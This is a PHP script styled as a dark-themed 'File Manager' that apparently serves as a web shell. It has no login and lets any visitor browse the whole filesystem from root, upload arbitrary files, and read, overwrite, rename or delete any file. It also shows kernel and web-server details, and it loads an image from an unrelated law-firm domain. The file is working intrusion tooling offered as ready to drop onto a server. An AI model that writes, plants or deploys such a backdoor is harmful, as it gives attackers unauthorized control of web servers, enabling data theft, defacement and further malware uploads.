<?php
ob_start();
session_start();

$base_dir = '/';
$current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : realpath(__DIR__);

if (strpos($current_dir, $base_dir) !== 0) {
    $current_dir = __DIR__;
}

$message = isset($_SESSION['message']) ? $_SESSION['message'] : '';
unset($_SESSION['message']);

function formatSize($size) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $power = $size > 0 ? floor(log($size, 1024)) : 0;
    return number_format($size / pow(1024, $power), 2) . ' ' . $units[$power];
}

if (isset($_FILES['file_upload']) && !empty($_FILES['file_upload']['name'])) {
    $upload_file = $current_dir . '/' . basename($_FILES['file_upload']['name']);
    $message = move_uploaded_file($_FILES['file_upload']['tmp_name'], $upload_file)
        ? "File " . basename($_FILES['file_upload']['name']) . " successfully uploaded."
        : "Failed to upload file " . basename($_FILES['file_upload']['name']) . ".";
}

if (isset($_GET['delete'])) {
    $file_to_delete = realpath($_GET['delete']);
    if (file_exists($file_to_delete) && strpos($file_to_delete, $current_dir) === 0) {
        $_SESSION['message'] = (is_dir($file_to_delete) ? rmdir($file_to_delete) : unlink($file_to_delete))
            ? "File/Folder " . basename($file_to_delete) . " successfully deleted."
            : "Failed to delete " . basename($file_to_delete) . ".";
    } else {
        $_SESSION['message'] = "File/Folder " . basename($file_to_delete) . " not found.";
    }
    header("Location: ?dir=" . urlencode($current_dir));
    exit;
}

if (isset($_POST['rename_file']) && isset($_POST['new_name'])) {
    $old_name = realpath($_POST['rename_file']);
    $new_name = dirname($old_name) . '/' . $_POST['new_name'];
    if (file_exists($old_name) && strpos($old_name, $current_dir) === 0) {
        $message = rename($old_name, $new_name)
            ? "File/Folder " . basename($old_name) . " successfully renamed to " . $_POST['new_name'] . "."
            : "Failed to rename " . basename($old_name) . ".";
    } else {
        $message = "File/Folder " . basename($old_name) . " not found.";
    }
}

if (isset($_POST['edit_file']) && isset($_POST['file_content'])) {
    $file_to_edit = realpath($_POST['edit_file']);
    if (file_exists($file_to_edit) && !is_dir($file_to_edit)) {
        $message = file_put_contents($file_to_edit, trim($_POST['file_content'])) !== false
            ? "File " . basename($file_to_edit) . " successfully edited."
            : "Failed to edit " . basename($file_to_edit) . ".";
    } else {
        $message = "File " . basename($file_to_edit) . " not found or is a directory.";
    }
}

if (isset($_GET['get_content'])) {
    $file_path = realpath($_GET['get_content']);
    if (file_exists($file_path) && !is_dir($file_path)) {
        header('Content-Type: text/plain');
        ob_clean();
        echo trim(file_get_contents($file_path));
        exit;
    } else {
        header('HTTP/1.1 404 Not Found');
        ob_clean();
        echo "File not found or is a directory.";
        exit;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>File Manager</title>
    <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&family=Roboto+Mono:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Orbitron', 'Roboto Mono', monospace;
            margin: 0;
            padding: 20px;
            background-color: #1a1a1a;
            color: #e0e0e0;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
            font-size: 14px;
        }
        h1 {
            color: #00ccff;
            border-bottom: 2px solid #00ccff;
            padding-bottom: 10px;
            text-transform: uppercase;
            letter-spacing: 3px;
            margin-bottom: 20px;
            font-weight: 700;
        }
        h1 a {
            color: #00ccff;
            text-decoration: none;
            transition: color 0.3s;
        }
        h1 a:hover {
            color: #66e0ff;
        }
        .message {
            padding: 10px;
            margin-bottom: 15px;
            border-radius: 5px;
            color: #fff;
            font-weight: 700;
            width: 100%;
            box-sizing: border-box;
            font-family: 'Roboto Mono', monospace;
        }
        .message.success {
            background-color: #2ecc71;
        }
        .message.error {
            background-color: #e74c3c;
        }
        .table-wrapper {
            position: relative;
            width: 100%;
        }
        table.main-table {
            width: 100%;
            border-collapse: collapse;
            background-color: #2a2a2a;
            box-shadow: 0 0 20px rgba(0, 204, 255, 0.2);
            margin-bottom: 20px;
            font-family: 'Roboto Mono', monospace;
        }
        table.main-table th, table.main-table td {
            padding: 15px;
            text-align: left;
            border-bottom: 1px solid #3a3a3a;
        }
        table.main-table th {
            background-color: #00ccff;
            color: #1a1a1a;
            text-transform: uppercase;
            font-weight: 700;
        }
        table.main-table td p {
            color: #00ccff;
            margin: 5px 0;
        }
        .table-image {
            position: absolute;
            top: -30px;
            right: 0;
            width: 200px;
            height: 100%;
            object-fit: cover;
            margin: 10px;
        }
        .upload-form {
            display: flex;
            gap: 10px;
            align-items: center;
        }
        .upload-form input[type="file"] {
            padding: 5px;
            background-color: #3a3a3a;
            border: 1px solid #00ccff;
            color: #e0e0e0;
            border-radius: 5px;
            font-family: 'Roboto Mono', monospace;
        }
        .upload-form input[type="submit"] {
            padding: 8px 15px;
            background-color: #00ccff;
            color: #1a1a1a;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
            font-family: 'Orbitron', monospace;
            font-weight: 700;
        }
        .upload-form input[type="submit"]:hover {
            background-color: #00b3e6;
        }
        .dir-link {
            color: #00ccff;
            text-decoration: none;
            transition: color 0.3s;
            font-weight: 400;
        }
        .dir-link:hover {
            color: #66e0ff;
            text-decoration: underline;
        }
        table.file-table {
            width: 100%;
            max-width: 100%;
            border-collapse: collapse;
            background-color: #2a2a2a;
            box-shadow: 0 0 20px rgba(0, 204, 255, 0.2);
            overflow-y: auto;
            font-family: 'Roboto Mono', monospace;
            table-layout: fixed;
        }
        table.file-table th {
            background-color: #00ccff;
            color: #1a1a1a;
            padding: 12px;
            text-align: left;
            text-transform: uppercase;
            position: sticky;
            top: 0;
            z-index: 1;
            font-weight: 700;
        }
        table.file-table td {
            padding: 12px;
            border-bottom: 1px solid #3a3a3a;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
        }
        table.file-table th:nth-child(1), table.file-table td:nth-child(1) { width: 40%; }
        table.file-table th:nth-child(2), table.file-table td:nth-child(2) { width: 20%; }
        table.file-table th:nth-child(3), table.file-table td:nth-child(3) { width: 20%; }
        table.file-table th:nth-child(4), table.file-table td:nth-child(4) { width: 20%; }
        table.file-table tr:hover {
            background-color: #3a3a3a;
        }
        .action-form {
            display: flex;
            gap: 5px;
            align-items: center;
        }
        .action-form input[type="text"] {
            padding: 5px;
            border: 1px solid #00ccff;
            background-color: #3a3a3a;
            color: #e0e0e0;
            border-radius: 3px;
            font-family: 'Roboto Mono', monospace;
        }
        .action-form input[type="submit"] {
            padding: 5px 10px;
            background-color: #00ccff;
            color: #1a1a1a;
            border: none;
            border-radius: 3px;
            cursor: pointer;
            transition: background-color 0.3s;
            font-family: 'Orbitron', monospace;
            font-weight: 700;
        }
        .action-form input[type="submit"]:hover {
            background-color: #00b3e6;
        }
        .delete-link, .edit-link {
            color: #e74c3c;
            text-decoration: none;
            margin-right: 10px;
            transition: color 0.3s;
            font-family: 'Orbitron', monospace;
            font-weight: 400;
        }
        .edit-link {
            color: #2ecc71;
        }
        .delete-link:hover {
            color: #c0392b;
            text-decoration: underline;
        }
        .edit-link:hover {
            color: #27ae60;
            text-decoration: underline;
        }
        .edit-box {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #2a2a2a;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 20px rgba(0, 204, 255, 0.5);
            z-index: 1000;
            border: 1px solid #00ccff;
        }
        .edit-box-content {
            display: flex;
            gap: 20px;
            align-items: stretch;
        }
        .edit-box textarea {
            width: 500px;
            height: 300px;
            padding: 10px;
            background-color: #3a3a3a;
            border: 1px solid #00ccff;
            color: #e0e0e0;
            border-radius: 5px;
            font-family: 'Roboto Mono', monospace;
            font-size: 13px;
            resize: none;
        }
        .edit-box .image-buttons-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 10px;
        }
        .edit-box .edit-image {
            width: 200px;
            height: auto;
            object-fit: contain;
        }
        .edit-box .edit-buttons {
            display: flex;
            flex-direction: column;
            gap: 20px;
            width: 100%;
        }
        .edit-box input[type="submit"], .edit-box button {
            padding: 8px 15px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
            font-family: 'Orbitron', monospace;
            font-weight: 700;
            width: 100%;
        }
        .edit-box input[type="submit"] {
            background-color: #2ecc71;
            color: #1a1a1a;
        }
        .edit-box input[type="submit"]:hover {
            background-color: #27ae60;
        }
        .edit-box button {
            background-color: #e74c3c;
            color: #fff;
        }
        .edit-box button:hover {
            background-color: #c0392b;
        }
        .overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.8);
            z-index: 999;
        }
    </style>
</head>
<body>
    <h1><a href="<?php echo basename(__FILE__); ?>">File Manager</a></h1>
    
    <?php if (!empty($message)): ?>
        <div class="message <?php echo strpos($message, 'successfully') !== false ? 'success' : 'error'; ?>">
            <?php echo $message; ?>
        </div>
    <?php endif; ?>

    <div class="table-wrapper">
        <table class="main-table">
            <tr>
                <th>System Information</th>
                <td>
                    <p>Kernel: <?php echo php_uname('s') . ' ' . php_uname('n') . ' ' . php_uname('r') . ' ' . php_uname('v') . ' ' . php_uname('m') . ' (' . date('Y', filemtime('/proc/version')) . ')'; ?></p>
                    <p>Web Server: <?php 
                        $server_software = $_SERVER['SERVER_SOFTWARE'];
                        echo strpos($server_software, 'Apache') !== false ? 'Apache' : 
                            (strpos($server_software, 'LiteSpeed') !== false ? 'LiteSpeed' : $server_software);
                    ?></p>
                </td>
            </tr>
            <tr>
                <th>Upload File</th>
                <td>
                    <form class="upload-form" method="post" enctype="multipart/form-data">
                        <input type="file" name="file_upload">
                        <input type="submit" value="Upload">
                    </form>
                </td>
            </tr>
            <tr>
                <th>Current Directory</th>
                <td>
                    <?php
                    $path_parts = explode('/', $current_dir);
                    $temp_path = '';
                    echo '<a class="dir-link" href="?dir=/">/</a>';
                    foreach ($path_parts as $part) {
                        if (!empty($part)) {
                            $temp_path .= '/' . $part;
                            echo '<a class="dir-link" href="?dir=' . urlencode($temp_path) . '">' . $part . '</a>';
                            if (end($path_parts) !== $part) echo '/';
                        }
                    }
                    ?>
                </td>
            </tr>
        </table>
        <img src="https://citylaw.com.sg/nana.webp" alt="Nana Image" class="table-image">
    </div>

    <table class="file-table">
        <tr>
            <th>Name</th>
            <th>Size</th>
            <th>Permissions</th>
            <th>Actions</th>
        </tr>
        <?php
        $items = scandir($current_dir);
        $folders = [];
        $files = [];

        foreach ($items as $item) {
            if ($item != '.' && $item != '..') {
                $full_path = $current_dir . '/' . $item;
                if (is_dir($full_path)) $folders[] = $item;
                else $files[] = $item;
            }
        }

        foreach ($folders as $folder) {
            $full_path = $current_dir . '/' . $folder;
            echo "<tr>
                <td><a class='dir-link' href='?dir=" . urlencode($full_path) . "'>$folder</a></td>
                <td>-</td>
                <td>" . substr(sprintf('%o', fileperms($full_path)), -4) . "</td>
                <td>
                    <a class='delete-link' href='?dir=" . urlencode($current_dir) . "&delete=" . urlencode($full_path) . "'>Delete</a>
                    <form class='action-form' method='post'>
                        <input type='hidden' name='rename_file' value='$full_path'>
                        <input type='text' name='new_name' placeholder='New name'>
                        <input type='submit' value='Rename'>
                    </form>
                </td>
            </tr>";
        }

        foreach ($files as $file) {
            $full_path = $current_dir . '/' . $file;
            echo "<tr>
                <td>$file</td>
                <td>" . formatSize(filesize($full_path)) . "</td>
                <td>" . substr(sprintf('%o', fileperms($full_path)), -4) . "</td>
                <td>
                    <a class='edit-link' href='#' onclick=\"showEditBox('" . addslashes($full_path) . "')\">Edit</a>
                    <a class='delete-link' href='?dir=" . urlencode($current_dir) . "&delete=" . urlencode($full_path) . "'>Delete</a>
                    <form class='action-form' method='post'>
                        <input type='hidden' name='rename_file' value='$full_path'>
                        <input type='text' name='new_name' placeholder='New name'>
                        <input type='submit' value='Rename'>
                    </form>
                </td>
            </tr>";
        }
        ?>
    </table>

    <div class="overlay" id="overlay" onclick="hideEditBox()"></div>
    <div class="edit-box" id="editBox">
        <form method="post">
            <div class="edit-box-content">
                <textarea name="file_content" id="fileContent"></textarea>
                <div class="image-buttons-container">
                    <img src="https://static.wikia.nocookie.net/honkaiimpact3_gamepedia_en/images/f/f7/Kiana_the_Reader.png" alt="Kiana the Reader" class="edit-image">
                    <div class="edit-buttons">
                        <input type="submit" value="Save">
                        <button type="button" onclick="hideEditBox()">Cancel</button>
                    </div>
                </div>
            </div>
            <input type="hidden" name="edit_file" id="editFile">
        </form>
    </div>

    <script>
        function showEditBox(filePath) {
            fetch('?get_content=' + encodeURIComponent(filePath))
                .then(response => {
                    if (!response.ok) throw new Error('File could not be loaded');
                    return response.text();
                })
                .then(data => {
                    document.getElementById('fileContent').value = data;
                    document.getElementById('editFile').value = filePath;
                    document.getElementById('editBox').style.display = 'block';
                    document.getElementById('overlay').style.display = 'block';
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Failed to load file content: ' + error.message);
                });
        }

        function hideEditBox() {
            document.getElementById('editBox').style.display = 'none';
            document.getElementById('overlay').style.display = 'none';
        }
    </script>
</body>
</html>